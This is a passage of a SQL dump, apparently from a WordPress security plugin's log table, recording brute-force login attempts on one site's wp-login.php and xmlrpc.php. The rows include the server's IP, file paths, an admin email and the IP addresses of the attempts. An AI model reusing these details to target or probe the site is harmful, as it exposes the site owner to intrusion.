14:18:20',18257344,19555064,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.68.121'),(25080,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.68.121\";s:11:\"REMOTE_PORT\";s:5:\"36106\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYI8qCR0vdvYEIduPCL2sAAAARU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568816296.5122\";s:12:\"REQUEST_TIME\";s:10:\"1568816296\";}}','notice','2019-09-18 14:18:18','2019-09-18 14:18:16',17741216,19232464,'https://bintara.com.my/wp-login.php',1,0,'178.128.68.121'),(25079,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.100.99\";s:11:\"REMOTE_PORT\";s:5:\"46482\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYI7CG4SfF9g@8lNlxxbpwAAAEQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568815880.6862\";s:12:\"REQUEST_TIME\";s:10:\"1568815880\";}}','notice','2019-09-18 14:11:22','2019-09-18 14:11:21',18257720,19555136,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.100.99'),(25078,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.100.99\";s:11:\"REMOTE_PORT\";s:5:\"44018\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYI6@8rWzCkhZpjT3iOlmAAAAVM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568815867.5303\";s:12:\"REQUEST_TIME\";s:10:\"1568815867\";}}','notice','2019-09-18 14:11:08','2019-09-18 14:11:07',17740632,19230856,'https://bintara.com.my/wp-login.php',1,0,'166.62.100.99'),(25077,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"149.202.204.104\";s:11:\"REMOTE_PORT\";s:5:\"33850\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYI3aMrWzCkhZpjT3iOgHAAAAUc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568814952.2327\";s:12:\"REQUEST_TIME\";s:10:\"1568814952\";}}','notice','2019-09-18 13:55:53','2019-09-18 13:55:52',18257376,19554008,'https://bintara.com.my/xmlrpc.php',1,0,'149.202.204.104'),(25076,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"149.202.204.104\";s:11:\"REMOTE_PORT\";s:5:\"33120\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYI3ZcrWzCkhZpjT3iOgGAAAAVc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568814949.1867\";s:12:\"REQUEST_TIME\";s:10:\"1568814949\";}}','notice','2019-09-18 13:55:50','2019-09-18 13:55:49',17740936,19232368,'https://bintara.com.my/wp-login.php',1,0,'149.202.204.104'),(25075,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"46.45.160.75\";s:11:\"REMOTE_PORT\";s:5:\"54104\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYI11srWzCkhZpjT3iOeXgAAAVc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568814550.9613\";s:12:\"REQUEST_TIME\";s:10:\"1568814550\";}}','notice','2019-09-18 13:49:12','2019-09-18 13:49:11',18258648,19555224,'https://bintara.com.my/xmlrpc.php',1,0,'46.45.160.75'),(25073,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"103.221.221.133\";s:11:\"REMOTE_PORT\";s:5:\"56286\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIz@8rWzCkhZpjT3iOczAAAAUA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568814075.8926\";s:12:\"REQUEST_TIME\";s:10:\"1568814075\";}}','notice','2019-09-18 13:41:17','2019-09-18 13:41:16',18258952,19554520,'https://bintara.com.my/xmlrpc.php',1,0,'103.221.221.133'),(25074,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"46.45.160.75\";s:11:\"REMOTE_PORT\";s:5:\"53628\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYI108rWzCkhZpjT3iOeWwAAAUg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568814547.6607\";s:12:\"REQUEST_TIME\";s:10:\"1568814547\";}}','notice','2019-09-18 13:49:09','2019-09-18 13:49:08',17741800,19233824,'https://bintara.com.my/wp-login.php',1,0,'46.45.160.75'),(25072,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"103.221.221.133\";s:11:\"REMOTE_PORT\";s:5:\"55556\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIz@MrWzCkhZpjT3iOcyAAAAUk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568814072.9303\";s:12:\"REQUEST_TIME\";s:10:\"1568814072\";}}','notice','2019-09-18 13:41:14','2019-09-18 